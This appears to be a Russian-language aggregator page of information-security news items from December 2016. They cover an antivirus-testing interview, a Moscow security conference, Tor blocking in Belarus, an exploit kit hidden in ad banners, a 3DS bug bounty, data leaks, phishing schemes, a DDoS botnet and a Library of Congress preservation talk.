Р.Ц.: Почему бы и нет? Все, что Вам необходимо, — это хорошая (новая) идея и ее внедрение. Это может быть Святой Грааль эвристики и проактивная блокировка полностью нового типа угроз, или даже нескольких угроз. С этого же самого в конце 80-х годов начали и современные антивредоносные продукты. Конечно, в наши дни решения, которое будет бороться с чем-то одним, уже недостаточно, поскольку потребители ожидают получить многоуровневое решение с полноценными функциями защиты, и огромное количество ежедневно появляющихся новых вредоносных программ делает невозможным развивать его только своими силами. Поэтому представляется более разумным, если Вы продадите Вашу технологию более крупной компании, либо станете нишевым игроком на рынке решений «второго мнения». Но… ничего плохого нет!

Л.К.: Вы работали в проектах, которые сотрудничали с правительственными органами, учреждениями и компаниями. По Вашему мнению, кто должен быть более заинтересован в совершенствовании своих знаний об ИТ-безопасности? Правительства? Компании? Общественные организации?

Р.Ц.: К сожалению, все вышеперечисленные. Образование и Осведомленность – здесь это ключевые моменты. Новые угрозы появляются постоянно, и Вам необходимо знать о них, чтобы защищать себя. Или, по крайней мере, быть способным проверить, защищает ли Вас от них Ваш производитель решения безопасности.

Правительства пытаются сделать так, чтобы все люди использовали цифровые системы, при этом гарантировать их конфиденциальность, но что они могут? Они говорят, что делают это, но потом, даже на таких крупных общественных событиях как выборы Президента США в 2016 году, где должны быть приняты все меры безопасности, всплыли недочеты в безопасности.
В приведенном выше примере, официальный сайт ныне избранного Дональда Трампа допускал использование произвольного URL для показа заголовка над архивом новостей. Это может быть использовано для забавной шутки, но скорее всего это может использоваться в тех случаях, когда такой произвольный URL дополнен, например, каким-то скриптом.

Л.К.: Вы сотрудничали с правоохранительными органами для расследования многочисленных случаев киберпреступлений. По Вашему мнению, готовы ли правоохранительные органы бороться с киберпреступностью? Достаточно ли у них ресурсов?

Р.Ц.: Они хорошо подготовлены и в большинстве случаев имеют достаточно ресурсов для борьбы с киберпреступностью. Вы будете удивлены тому, что они знают на самом деле и что могут сделать. Но что, как правило, является проблемой, так это международные законы. Киберпреступность не имеет границ, но мы застряли с национальными законами, которые не способствуют борьбе с ней. Кроме того, киберпреступность является цифровой, и она стремительна. Слишком много законов препятствует осуществлению незамедлительных действий. Политики должны наверстать упущенное с помощью более адекватных законов, чтобы «идти в ногу со временем» и не тратить годы на разработку требуемых мер против современных угроз. Все это должно позволить правоохранительным органам полностью в соответствии с законом действовать против киберпреступности, а не иметь в итоге ситуации, когда дело рассыпается в суде из-за устаревшего законодательства.

Л.К.: Достигли ли мы надлежащего уровня взаимодействия между правоохранительными органами и экспертами/производителями решений безопасности, или Вы думаете, что еще есть, что совершенствовать?

Р.Ц.: Возможности для совершенствования есть всегда. Но правоохранительные органы и частный бизнес уже работают вместе (хотя, как уже говорилось, этому не сильно способствуют местные законы). Кстати, по инициативе правоохранительных органов готовятся к запуску некоторые новые направления сотрудничества. Это ясно показывает, что работая вместе, будет намного проще достичь общей цели: «загнать в угол» киберпреступников и уничтожить убежища для них.

Л.К.: Атаки шифровальщиков могут иметь катастрофические последствия для домашних пользователей, сотрудников предприятий и самих компаний в целом. Стоимость восстановления после таких инцидентов безопасности может быть достаточно высокой для предприятий. Впрочем, что Вы думаете о тех расходах, с которыми компании должны столкнуться при предотвращении таких атак?

Р.Ц.: Они должны рассматриваться как превентивная мера, что-то вроде страховки. Вы тратите деньги на замок для Вашей двери, хотя дверь и так может быть закрыта, правильно? И когда Вы сравните стоимость профилактических мер с размером ущерба от шифровальщиков (простои в работе, потерянное время, проверка и очистка всей сети, т.к. Вы не знаете, возможно, где-то остались исполняемые файлы украденных данных в открытом доступе или установлен backdoor и т.д., негативный PR и пр.), то Вы увидите, что это не так дорого. Осведомленность (и, следовательно, правильное образование) – это ключевой момент для всех людей, чтобы понимать, что ранее оповещение о подозрительной активности может сэкономить для компании большие деньги. В этом случае ущерб от оповещения о подозрительной активности, которой на самом деле нет, нивелируется размером сэкономленных денег благодаря оповещению о подозрительной активности, которая на самом деле оказалась реальной угрозой.

Л.К.: Рихард, Вы работаете с AMTSO (Anti-Malware Testing Standards Organization) с момента ее создания. За это время у Вас была возможность работать на различных позициях внутри организации: CEO, CTO, а теперь Вы – член Правления. Какое влияние имеет AMTSO на сферу тестирования решений безопасности? Как это сказалось?

Р.Ц.: В моем восприятии AMTSO оказало серьезное влияние на сферу тестирования решений безопасности в мире. Да, конечно, вначале это была борьба, были допущены ошибки, но теперь, после устранения организационных недостатков, AMTSO составило Принципы и Рекомендации, адаптированные для тестеров и производителей, что позволяет обеспечивать проведение тестирований справедливо и адекватно. Также бросается в глаза, что и другие организации сейчас рекомендуют AMTSO и «совместимые» с AMTSO тесты или сертификацию продукта тестером в соответствии с Принципами и Рекомендациями AMTSO.

Л.К.: С какими вызовами столкнется AMTSO в ближайшем будущем?

Р.Ц.: AMTSO растет, и она превращает Принципы и Рекомендации в реальные стандартные документы. Это деликатная процедура, но когда она будет завершена и правильно выполнена, будет сделан большой шаг вперед. AMTSO привлекает в свои ряды все больше участников из различных отраслей, а также в ней есть компании из одних и тех же отраслей, но их мотивации и способы мышления отличаются от тех, что были установлены в данной отрасли ранее, в ней есть старые и молодые компании – все вместе они продолжают расширять AMTSO и вместе идти к достижению поставленных перед AMTSO целей. Вот это и будет вызовом. Но я уверен, что новое руководство будет способно справиться с ним.

Автор статьи: Луис Корронс (антивирусная лаборатория PandaLabs)

orig: 2016-12-06 12:01:56 / https://habrahabr.ru/post/316952/ (click post title)



На VII Всероссийской конференции «Безопасные информационные технологии» (БИТ – 2016) представлены инновационные изыскания МГТУ им. Н.Э.Баумана по кибербезопасности!

16 ноября 2016 года на базе Московского государственного технического университета имени Н.Э. Баумана состоялась  VII Всероссийская научно-техническая конференция «Безопасные информационные технологии» (БИТ — 2016).

Организатором Конференции традиционно явилась кафедра ИУ-8 «Информационная безопасность». В качестве научно-технического партнера Конференции выступила группа компаний НПО «Эшелон», а информационного — рецензируемый научный журнал «Вопросы кибербезопасности».

В ходе Конференции были рассмотрены самые актуальные вопросы обеспечения кибербезопасности:

1


Конференция прошла под председательством Руководителя НУК «Информатика и системы управления» — заведующего кафедрой «Информационная безопасность» МГТУ им. Н.Э.Баумана, Заслуженного деятеля науки РФ, Лауреата ряда государственных премий СССР и РФ в области науки, доктора технических наук, профессора Матвеева В.А.

Пленарные выступления включили приветственное слово от Руководителя Управления ФСТЭК России по ЦФО (Райков О.В.) и актуальные научные доклады от 3 ЦНИИ Минобороны России (доцент Зубарев И.В.), 18 ЦНИИ Минобороны России (доцент Голов И.Ю.), НЦПИ Минюста России (доцент Федичев А.В.), Университета Иннополис (профессор Петренко С.А.), МГТУ им. Н.Э.Баумана (профессор Марков А.С., доцент Горшков Ю.Г., доцент Жуков А.Е., доцент Бельфер Р.А.).

В ходе Конференции работали пять научных секций:

  • Методы криптографической защиты (руководитель секции доцент Жуков А.Е.).
  • Методы и средства защиты инфокоммуникационных и биометрических систем (руководитель секции доцент Горшков Ю.Г.).
  • Правовые и организационно-технические меры информационной безопасности (руководитель секции доцент Шахалов И.Ю.).
  • Методы анализа защищенности информационных ресурсов (руководитель секции доцент Цирлов В.Л.).
  • Общие проблемы информационной безопасности и защиты данных (руководители секции: доцент Ключарев П.Г. и старший преподаватель Левиев Д.О.).
  • В рамках работы секций было представлено 69 научных докладов.

    На конференции был анонсирован Конкурс по этичному хакингу «Эшелонированная оборона», который ежегодно проводит группа компаний НПО «Эшелон» среди студентов и аспирантов ведущих вузов стран СНГ и ближнего зарубежья.

    Подробная информация о Конференции представлена на сайте: www.baumanist.ru

    Possibly Related Posts:


    orig: 2016-12-06 11:22:51 / http://s3r.ru/2016/12/konferentsii-i-vyistavki/na-vii-vserossiyskoy-konferentsii-bezopasnyie-informatsionnyie-tehnologii-bit-2016-predstavlenyi-innovatsionnyie-izyiskaniya-mgtu-im-n-e-baumana-po-kiberbezopasnosti/ (click post title)



    Белорусские цензоры добрались до Tor

    Пользователи в Беларуси сообщили о блокировке доступа к Tor.

    Интернет-пользователи в Беларуси зафиксировали блокировку доступа к основным серверам Tor. Первые сообщения о блокировке Tor в сетях интернет-провайдера Atlant Telecom и мобильного оператора Velcom начали появляться в конце ноября - начале декабря нынешнего года, сообщает ресурс «Радыё Свабода».

    Согласно статистике Tor Project, в начале декабря число прямых соединений с Беларусью снизилось на 30% (с 5 500 до 3000).

    Как отмечает издание Deuche Welle со ссылкой на неофициальные данные, домены Tor включены в закрытый реестр ограниченного доступа Республиканского унитарного предприятия по надзору за электросвязью БелГИЭ (РУП «БелГИЭ»). В данный перечень, находящийся в ведении Министерства информации Беларуси, включаются сайты, подлежащие блокировке.

    С 25 февраля 2015 года в стране действует постановление Оперативно-аналитического центра при президенте Беларуси и Министерства связи и информатизации, поручающее РУП «БелГИЭ» вносить в список ограниченного доступа прокси-серверы, анонимные сети наподобие Tor и другие средства, позволяющие получить доступ к заблокированным сайтам. Хотя постановление вступило в силу почти год назад, белорусские цензоры приступили к блокировке Tor только сейчас, отмечает издание.

    orig: 2016-12-06 11:12:37 / http://www.securitylab.ru/news/484654.php (click post title)



    Хакеры прячут набор эксплоитов в рекламе с помощью стеганографии

    Stegano содержит эксплоиты для уязвимостей в Flash Player и атакует пользователей Internet Explorer.

    Исследователи компании ESET сообщили о новом наборе эксплоитов, распространяющемся через рекламные баннеры на  популярных новостных сайтах со среднесуточной аудиторией порядка нескольких миллионов человек. Вредоносная кампания продолжается по крайней мере с октября текущего года. Stegano содержит эксплоиты для уязвимостей в Flash Player и атакует пользователей Internet Explorer.

    По словам исследователей, авторы Stegano используют «незаметные, даже параноидальные» техники, существенно усложняющие его анализ. Для заражения компьютера пользователю даже не нужно нажимать на вредоносный рекламный баннер, достаточно просто зайти на сайт, где он отображается. Если на системе жертвы установлена уязвимая версия Flash Player, эксплуатация уязвимостей происходит автоматически. Далее злоумышленники могут установить на скомпрометированном компьютере любое вредоносное ПО на свое усмотрение.

    Для сокрытия набора эксплоитов в рекламных баннерах злоумышленники используют стеганографию, отсюда и название Stegano. Если говорить точнее, хакеры прячут вредоносный код в параметрах, отвечающих за прозрачность каждого пикселя. Цвет изображения изменяется лишь незначительно, и уловить изменения невооруженным глазом невозможно.

    orig: 2016-12-06 11:10:14 / http://www.securitylab.ru/news/484655.php (click post title)



    Nintendo предлагает 20 000$ за обнаружение уязвимостей в консолях 3DS

    В понедельник Nintendo объявили о запуске новой программы вознаграждения за найденные уязвимости в линейке своих портативных игровых систем 3DS. Компания предложила от 100 до 20 000 долларов за бреши, которые удастся обнаружить в продукте.

    Описание программы по вознаграждению размещено на HackerOne и касается только консолей 3DS. Компания говорит, что в настоящее время они не заинтересованы в уязвимостях, затрагивающих другие платформы и услуги.

    Nintendo  готовы платить за бреши в системе и уязвимости, приводящие к повышению привилегий, затрагивающие процессоры ARM11 и ARM9. Компания также вознаградит исследователей, сообщивших об уязвимостях, найденных в приложениях Nintendo и аппаратных недостатках, которые могут быть использованы для получения ключей безопасности.

    В рамках этой программы, Nintendo стремится предотвратить пиратство, мошенничество и распространение нежелательного контента для детей.

    «Отчет будет качественным, если будет демонстрация того, что уязвимость действительно может быть проэкплуатирована. Еще лучше, если в наличии будет функциональный код эксплойта» – говорят в Nintendo – «Если же у вас на данный момент нет доказательств того, что брешь можно использовать, либо нет функционального кода эксплоита, мы все равно рекомендуем сообщить нам как можно раньше. В этом случае концепцию эксплуатации можно будет предоставить позднее».

    Компания обещает выплаты исследователям в течение четырех месяцев после подтверждения наличия уязвимости, но не раньше того времени, когда брешь будет исправлена. Суммы вознаграждений не будут обнародованы. Кроме того, исследователям запрещается предавать огласке информацию о найденных уязвимостях даже после того, как соответствующие патчи будут выпущены.

    orig: 2016-12-06 09:58:25 / https://www.anti-malware.ru/news/2016-12-06/21633 (click post title)



    Миллионы аккаунтов Dailymotion предположительно скомпрометированы

    Служба уведомлений о скомпрометированных данных LeakedSource получила базу данных, содержащую информацию о примерно 85 миллионах  аккаунтах пользователей Dailymotion, включая имена пользователей, адреса электронной почты и, во многих случаях, пароли.

    Согласно LeakedSource, база данных включает 87 миллионов учетных записей с 85 миллионами уникальными адресами электронной почты. Более 18 миллионов записей включают хэши паролей. Хакеры утверждают, что данные были украдены в районе 20 октября.

    Поскольку пароли хэшировались с помощью алгоритма bcrypt, массово взломать их будет очень сложно. Однако если злоумышленники нацелятся на конкретного пользователя, они будут в состоянии взломать пароль.

    Служба LeakedSource уже известна тем, что раскрывала множество утечек конфиденциальных данных. В некоторых случаях, данные были получены хакерами несколько лет назад, однако компании не всегда уведомляли об этом клиентов.

    orig: 2016-12-06 09:28:19 / https://www.anti-malware.ru/news/2016-12-06/21632 (click post title)



    ESET: мошенники подделывают сообщения Amazon

    ESETпредупреждает пользователей Amazon о новой волне фишинга. Мошенники добывают личные данные клиентов, рассылая от лица площадки письма о несуществующей проблеме с заказом.

    Чтобы решить «проблему», пользователю предлагают обновить персональные данные, перейдя по ссылке. Мошенники утверждают, что в противном случае доступ к аккаунту Amazon будет заблокирован.

    По ссылке пользователь попадает на поддельный сайт, имитирующий дизайн легитимного Amazon.com. Там ему предлагают ввести персональные данные, включая реквизиты банковской карты, и нажать кнопку «Сохранить и продолжить». После этого пользователь будет перенаправлен на настоящий Amazon.com, чтобы исключить подозрения.

    Накануне Нового года пользователи чаще покупают онлайн и, как следствие, больше подвержены «тематическому» фишингу. ESET советует тщательно проверять адреса отправителей писем и игнорировать сомнительные сообщения.

    orig: 2016-12-06 09:07:03 / https://www.anti-malware.ru/news/2016-12-06/21631 (click post title)



    IBM: компании все еще не готовы противостоять кибератакам

    Компания IBMinfo-icon и Ponemoninfo-icon Institute опубликовали результаты глобального исследования устойчивости организаций к кибератакам под названием «Cyber Resilient Organization». Согласно результатам исследования, только 32% специалистов в сфере ИТ и безопасности считают, что их компании имеют высокий уровень киберзащиты.

    В 2015 году этот показатель составлял 35%. Помимо этого, 66% респондентов, участвовавших в исследовании в 2016 году, отмечают, что их организации не готовы к восстановлению после кибератак.

    Проблемы, связанные с реагированием на инциденты (Incident Response), как показывает исследование второй год подряд, являются основным препятствием в обеспечении устойчивости организаций к угрозам кибербезопасности. 75% опрошенных заявили, что в их компаниях отсутствует план по реагированию на киберинциденты (Cyber Security Incident Response Plan). В тех организациях, где такой план есть, 52% респондентов не пересматривали или обновляли документ с момента его принятия, или, более того, такая процедура не предусмотрена в компании. Вместе с тем, 41% участников исследования отметили, что за последние 12 месяцев увеличилось время, которое требуется для разрешения киберинцидента. 31% респондентов ответили, что этот показатель уменьшился.

    «Исследование устойчивости предприятий к угрозам кибербезопасности показывает, что в 2016 году организации во всем мире до сих пор не готовы к реагированию и нейтрализации инцидентов, – заявил Джон Брюс, глава и соучредитель Resilient, компании IBM. – Лидеры безопасности могут добиться значительных улучшений, сделав главным приоритетом реагирование на инциденты и сосредоточив внимание на планировании, подготовке и сборе информации».

    По мнению респондентов, платформа реагирования на инциденты (Incident Response Platform) является одной из наиболее эффективных технологий безопасности, которая помогает организациям противостоять кибератакам, наряду с управлением идентификацией и аутентификацией, системами обнаружения и предотвращения взломов.

    В ходе исследования также были выявлены типичные проблемы, препятствующие увеличению уровня кибербезопасности организаций. Большинство участников опроса (66%) считают, что недостаточное планирование и низкая готовность являются главными барьерами для повышения устойчивости предприятий к киберугрозам. Респонденты также указывают, что сложность ИТ и бизнес-процессов растет быстрее, чем способность предотвращать, обнаруживать и реагировать на кибератаки, что делает компании уязвимыми. В этом году 46% участников исследования указали повышенную сложность ИТ-процессов как главную помеху для выстраивания надежной информационной защиты бизнеса – показатель вырос с 36% по итогам исследования 2015 года. 52% респондентов заявили, что сложность бизнес-процессов является существенным барьером, по сравнению с 47% в 2015 году.

    Исследование «2016 Cyber Resilient Organization», проведенное Ponemon Institute при поддержке Resilient, представляет собой обзор передового опыта по противостоянию киберугрозам, а именно, способности предприятий поддерживать бесперебойную работу и сохранять свою целостность перед лицом кибератак. В глобальном исследовании приводятся инсайты, полученные в ходе опроса более 2,4 тысяч специалистов в сфере ИТ и безопасности со всего мира, в том числе из США, Великобритании, Франции, Германии, ОАЭ, Бразилии и Австралии.

    Недавнее исследование IBM Institute for Business Value показало, что уменьшение времени реагирования на инциденты является ключевой задачей, которая стоит перед специалистами в сфере безопасности. Настоящее исследование Ponemon Institute обнаружило, что большинство компаний сегодня все еще не принимают надлежащие меры для подготовки эффективного и всеобъемлющего плана по реагированию.

    В то время как результаты исследования свидетельствуют о том, что многие организации еще не реализовали эффективное планирование и меры по обеспечению готовности для отработки кибератак, другие исследования показывают, что реагирование на инциденты безопасности станет важнейшим приоритетом в течение следующих нескольких лет.

     «Компании понимают важность использования плана по реагированию на инциденты, однако вместе с тем все еще ощущается нехватка компетентных специалистов, а также соответствующих процессов и технологий на предприятии, – сказал доктор Ларри Понемон. – Мы рады отметить, что этот вопрос приобретает все большее значение в общей стратегии информационной безопасности компаний».

    Ключевые выводы исследования:

    Компании подвергаются частым и успешным кибератакам

    Организации не могут обеспечивать непрерывную работу и быстро восстанавливаться после атак

    Самым большим барьером является недостаток планирования и подготовки

    Способность реагировать на кибератаки существенно не улучшилась

    orig: 2016-12-06 09:00:49 / https://www.anti-malware.ru/news/2016-12-06/21630 (click post title)



    СёрчИнформ и ЦРТ представили решение для защиты голосовой информации

    Совместное решение компании «СёрчИнформ» и «Центра речевых технологий» (ЦРТ) автоматически анализирует каналы связи и предотвращает утечки информации через голосовые коммуникации.

    Интеграция DLP-системы «Контур информационной безопасностиinfo-icon Сёрчинформ» с разработкой ЦРТ позволяет автоматически распознавать речь, преобразовывать ее в текст и анализировать данные на предмет нарушения политик безопасности. Решение облегчает работу ИБ-специалистов, которым раньше приходилось самостоятельно прослушивать и анализировать подозрительные аудиофайлы.

    «КИБ Сёрчинформ» обеспечивает контроль и запись разговоров пользователей, однако по записанным данным можно было осуществлять только атрибутный поиск, что делало невозможным определение содержания разговора без его прослушивания. При этом на прослушивание всех файлов ИБ-специалисты тратили значительное время и ресурсы.

    Интеграция «КИБ СёрчИнформ» с решением ЦРТ позволяет автоматически распознавать речь в аудиозаписях и получать их текстовую расшифровку. По расшифрованным аудиозаписям DLP-система осуществляет текстовый поиск, а также проводит автоматические проверки по настроенным политикам безопасности.

    «Решение ЦРТ позволяет получать качественный и быстрый результат, – отмечает технический директор «СёрчИнформ» Иван Мершков. – Несмотря на естественное «размытие» отдельных слов при произношении, технология распознает речь с минимальным процентом погрешностей. Важно и то, что для распознавания речи «КИБ СёрчИнформ» не использует внешние ресурсы. Процедура локальна и данные не покидают корпоративной сети, что гарантирует сохранность конфиденциальной информации».

    «Наше совместное решение существенно упрощает и способствует повышению эффективности работы служб ИБ компаний.  Специалистам по безопасности больше не нужно анализировать записи лично – текстовую расшифровку делает беспристрастная машина, а человек вступает в игру лишь тогда, когда выявлена реальная опасность раскрытия коммерческой тайны или другой утечки ценной корпоративной информации», – комментирует директор по развитию компании ЦРТ Алексей Закревский. 

    В DLP-системе «КИБ СёрчИнформ» за последние два года были расширены возможности анализа разных типов данных. Так, пользователям системы стали доступны:

    orig: 2016-12-06 08:36:40 / https://www.anti-malware.ru/news/2016-12-06/21629 (click post title)



    Неизвестный ботнет атаковал цели на Западном побережье США

    Специалисты компании CloudFlareinfo-icon сообщают, что неизвестный ботнет с завидным постоянством атакует неназванные цели на Западном побережье США. На момент публикации отчета, DDoS-атаки продолжались уже более десяти дней подряд, начавшись еще 23 ноября 2016 года, за день до празднования Дня благодарения в США.

    Исследователи пишут, что операторы бонета работают по такому же графику, что и обычный законный бизнес. Каждый день атаки длятся по восемь часов, начинаясь примерно в 18:00 UTC и заканчиваясь в районе 02:00 UTC. «Будто атакующие закончили рабочий день и отправились домой», — говорят аналитики.  В первый же день пиковая мощность атак достигла 172 миллионов пакетов в секунду, то есть 400 Гбит/с. На третий день пик уже составил 480 Гбит/с.

    «Атакующие просто продолжали [атаки] день за днем. Во время Дня благодарения, Черной пятницы, Киберпонеделька и далее на неделе. Вечер за вечером атаки достигали мощности 400 Гбит/с, и держались на уровне 320 Гбит/с в последние часы», — рассказывают в CloudFlare и отмечают, что потом злоумышленники сменили тактику, и со вторника, 29 ноября, атаки уже не прерывались и длились 24 часа в сутки.

    При этом исследователи убеждены, что за атаками стоит не Mirai-ботнет, что в свете последних месяцев уже кажется редкостью. Специалисты CloudFlare сообщили, что злоумышленники использовали Layer 3 и Layer 4 флуд посредством TCP, а это совсем не похоже на «почерк» Mirai, пишет xakep.ru.

    Данный инцидент лишний раз доказывает, насколько тривиальными стали атаки, чья мощность превышает 400 Гбит/с. Даже без зараженных IoT-устройств злоумышленники легко добиваются таких значений, о чем недавно писали и аналитики компании Akamai. Согласно отчету за третий квартал 2016 года (PDF), число атак превышающих 100 Гбит/с возросло на 138% по сравнению с третьим кварталом 2015 года.

    orig: 2016-12-06 08:32:19 / https://www.anti-malware.ru/news/2016-12-06/21628 (click post title)



    Инициативы Библиотеки Конгресса США в области электронной сохранности, часть 1


    Данная статья сотрудницы Библиотеки Конгресса США Джейми Меарз (Jaime Mears – на фото) была опубликована на сайте Библиотеки 23 ноября 2016 года в блоге «Сигнал – Обеспечение сохранности электронных материалов» (The Signal - Digital Preservation).

    От автора: Предлагаю Вашему вниманию текст доклада, с которым я выступала 10 ноября 2016 года на круглом столе по инициативам на конференции «Электронная сохранность 2016» (Digital Preservation 2016 – ключевая конференция, которую ежегодно проводит американский «Национальный альянс попечения об электронных материалах» - National Digital Stewardship Alliance, NDSA. С программой этой конференции можно познакомиться по адресу https://www.conftool.pro/dlf2016/index.php?page=browseSessions&presentations=show&form_tracks=2 – Н.Х.), объёдиненной с ежегодным форумом Федерации электронных библиотек (Digital Library Federation, DLF, https://www.diglib.org/ ). В докладе рассказывается о том, чем подразделение «Национальные электронные инициативы» (National Digital Initiatives division) занималось в 2016 финансовом году, и что предстоит сделать в 2017 финансовом году. О том, что было на форуме DLF, см. в посте на этом блоге по адресу http://blogs.loc.gov/thesignal/2016/11/conference-report-digital-library-federation-2016-forum/ .

    Логотип подразделения «Национальных электронных инициатив» Библиотеки Конгресса США.
    Здравствуйте! Меня зовут Джейми Меарз, я работаю в подразделении Национальных электронных инициатив Библиотеки Конгресса США, входящем в состав отдела национальной и международной информационно-просветительской деятельности (National and International Outreach).

    В число наших целей входит поиск стратегических партнерств, помогающих сделать наши коллекции более доступными, повысить осведомленность о них и расширить взаимодействие с ними. Так что по ходу моего рассказа о том, что мы сделали и что планируем сделать, пожалуйста, подумайте о том, нет ли здесь общего, какой-либо синергии с усилиями Вашего собственного учреждения.

    Рис.1: Сотрудники подразделения Национальных электронных инициатив Кейт Зваард, Эбби Поттер, Майк Эшенфельдер и Джейми Меарз
    Подразделение Национальных электронных инициатив - это небольшая подвижная группа, созданная в 2015 году с целью максимизации отдачи от электронных коллекций Библиотеки Конгресса. Руководитель нашей группы Кейт Зваард (Kate Zwaard) ранее руководила группой по развитию электронных хранилищ (Digital Repository Development)  и возглавляла усилия по приему на хранение трёх петабайт электронных материалов. Вы, возможно, читали материалы Майка Эшенфельдера (Майка Ashenfelder) на блоге The Signal (некоторые из них мною переведены, см. http://rusrim.blogspot.ru/2012/03/2012_11.html , http://rusrim.blogspot.ru/2013/02/2013_24.html и http://rusrim.blogspot.ru/2013/08/blog-post_547.html – Н.Х.), а Эбби Поттер (Abbey Potter) раньше работала организатором в NDSA и сотрудником программного офиса выполнявшейся Библиотекой Конгресса «Национальной программы развития инфраструктуры и обеспечения сохранности электронной информации» (National Digital Information Infrastructure and Preservation Program, NDIIPP).

    Я новый член группы, и меня взяли на работу сразу по завершении срока моего участия как «резидента» в Национальной программе поддержки специалистов по попечению над электронными материалами» (National Digital Stewardship Residency, NDSR, https://ndsr-program.org/ - пилотный проект, осуществляемый совместно Библиотекой Конгресса и Институтом музейных и библиотечных услуг (Museum and Library Services, IMLS) – Н.Х.), в рамках которого  я создала лабораторию для персональной электронной архивации (см. http://libguides.dclibrary.org/memorylab/ ).

    Рис.2: Джейми Меарз на стажировке в Библиотеке Конгресса в 2012 году
    Я, однако, не новичок в Библиотеке. Еще в 2012 году (рис.2) я в течение восьми месяцев работала в качестве стажера в Отделе рукописей (Manuscript Division, http://www.loc.gov/rr/mss/ ) , где мне было доверено помогать в обработке фонда Чарльза и Рей Имзов (Charles and Ray Eames, см. http://www.loc.gov/exhibits/eames/index.html - об американских архитекторах и дизайнерах Имзах см. статью в Википедии, https://ru.wikipedia.org/wiki/Имзы,_Чарлз_и_Рэй – Н.Х.). Имзы являются изобретателями «имзовского кресла» (нечто вроде шезлонга – Н.Х) и авторами ряда произведений современного искусства в таких формах, как кино, графический дизайн и архитектура.

    Пытаясь поддерживать порядок в офисе Рей в дизайн-студии Имзов в Калифорнии, команда Рэй периодически очищала её рабочий стол, складывая всё в сумку, большой конверт, корзину или заворачивая в шелковый шарф или что ещё под руку попадётся, и приляпывая к этому кусок корректирующей ленты с написанной на ней датой. При обработке коллекции Библиотекой было принято решение сохранить эти упаковки как своего рода «капсулы времени» а ля Энди Уорхол (Andy Warhol  - американский художник, заметная персона в истории поп-арт-движения и современного искусства в целом, см. статью о нём в Википедии https://ru.wikipedia.org/wiki/Уорхол,_Энди – Н.Х.).

    Моя работа как раз заключалась в том, чтобы просматривать эти мешки и, по существу, помочь сделать их доступными для исследователей. Стратегия заключалась в том, чтобы сгруппировать «провокационные» фрагменты и фрагменты, отражавшие цветовую палитру или дизайнерские темы, которые Рей в тот момент объединяла в композиции, чтобы побудить кого-нибудь исследовать остальные материалы. Это напоминало  визуальный индекс в капсулах времени.

    (Продолжение следует)

    Джейми Меарз (Jaime Mears)

    Источник: блог «Сигнал – Обеспечение сохранности электронных материалов» (The Signal - Digital Preservation) на сайте Библиотеки Конгресса США
    http://blogs.loc.gov/thesignal/2016/11/initiatives-at-the-library-of-congress-digital-preservation-2016-talk/ 

    orig: 2016-12-06 08:00:26 / http://rusrim.blogspot.com/2016/12/1.html (click post title)



    Facebook, Microsoft, Twitter и YouTube объявили о борьбе с терроризмом

    Компании создадут реестр, позволяющий быстро находить и блокировать «террористический контент».

    Facebook, Microsoft, Twitter и YouTube (Google) совместными усилиями будут бороться с террористическим контентом в Сети. В понедельник, 5 декабря, компании объявили о создании совместного реестра, призванного предотвратить распространение «террористического контента» в интернете. База данных позволит быстро вычислять и блокировать изображения и видеоролики экстремистского характера.

    В реестр будут включаться цифровые отпечатки изображений и видеороликов, используемых террористами для привлечения новых сторонников и призывов к экстремизму. Затем каждая из компаний будет проверять, нарушает ли добавленный контент ее политику, и при необходимости быстро находить его на своей платформе и удалять.

    «На наших сервисах нет места контенту, пропагандирующему терроризм. В случае выявления подобного контента, мы оперативно примем меры в соответствии с нашими политиками», - говорится в совместном заявлении компаний.

    Как и прежде, компании продолжат удалять контент по запросу контролирующих органов. Создатели реестра надеются, что в будущем к инициативе присоединятся и другие сервисы. Новая база данных заработает в начале 2017 года, после того, как будут решены технические вопросы.

    orig: 2016-12-06 07:51:35 / http://www.securitylab.ru/news/484653.php (click post title)



    ИБ-эксперт подарил аналитикам 1,4 млрд записей, утекших в результате взломов

    Трой Хант поступился принципами и опубликовал базу данных своего ресурса HaveIBeenPwned.

    ИБ-эксперт Трой Хант (Troy Hunt) решил сделать предрождественский подарок исследователям безопасности, предоставив им для анализа практически всю базу данных своего ресурса HaveIBeenPwned.

    Хант проделал огромную работу - собрал доступные в Сети утекшие данные интернет-пользователей (в общей сложности порядка 2 млрд записей), удалил дубликаты и создал сайт HaveIBeenPwned, позволяющий любому желающему проверить, стал ли он жертвой утечки информации.

    По словам исследователя, ему регулярно приходят просьбы предоставить собранную базу данных, однако он всегда отвечал отрицательно. Хант даже опубликовал блог-пост под названием «Нет, я не могу предоставить вам утекшие данные». Тем не менее, в третью годовщину HaveIBeenPwned исследователь поступился своими принципами и решил поделиться имеющимися у него сведениями, правда, с некоторыми оговорками.

    Эксперт удалил всю персонально идентифицируемую информацию, связанные с утекшими данными домены, а также сведения, похищенные в результате масштабных взломов. Как бы то ни было, но даже изрядно «почищенная» база данных содержит порядка 2,4 млн строк – настоящий клад для исследователей. С целью избежать чрезмерной нагрузки на свой сайт и облегчить обмен Хант выложил данные в виде торрент-файла. Хэш zip-файла: 31FE882F3F7C7917F1B0F2F04BCBF667B3E407DE.

    orig: 2016-12-06 07:41:34 / http://www.securitylab.ru/news/484651.php (click post title)



    Дайджест новостей по ИБ за 18 ноября - 2 декабря 2016 г.


    Блоги:

    Алексей Лукацкий и Андрей Прозоров разбирались, кто должен обновлять свою лицензию на ТЗКИ в связи с публикацией Постановления Правительства №541 от 15 июня 2016 года.

    Статьи:

    Защита виртуальных машин, размещенных в дата-центре, с помощью технологии Shielded VM.

    Программное обеспечение/сервисы:

    Kaspersky Cleaner - утилита для удаления ненужных и временных файлов, а также сохранения своей конфиденциальности.

    Аналитика:

    Мероприятия:

    Ресурсы:

    orig: 2016-12-06 06:46:24 / http://ser-storchak.blogspot.com/2016/12/18-2-2016.html (click post title)



    Ярославские мошенники используют WhatsApp для обмана клиентов банков

    Целью мошенников является получение данных для авторизации в сервисах online-банкинга.

    Мошенники из Ярославля взяли на вооружение популярный мессенджер WhatsApp. Как сообщает «Комсомольская правда» со ссылкой на Отделение по Ярославской области Центробанка России, с помощью приложения от имени банка злоумышленники рассылают жертвам поддельные сообщения.

    Схема работает следующим образом. Жертва получает в WhatsApp уведомление о том, что на ее банковскую карту зарезервирована покупка в online-магазине. На случай, если он ничего не заказывал, пользователю предлагается связаться с банком. Когда жертва звонит по указанному в сообщении номеру телефона, под видом сотрудников финансовой организации ей отвечают мошенники. Обманным путем преступники выманивают у ничего не подозревающего пользователя данные банковской карты, а также логин и пароль для авторизации в личном кабинете в банковском сервисе.

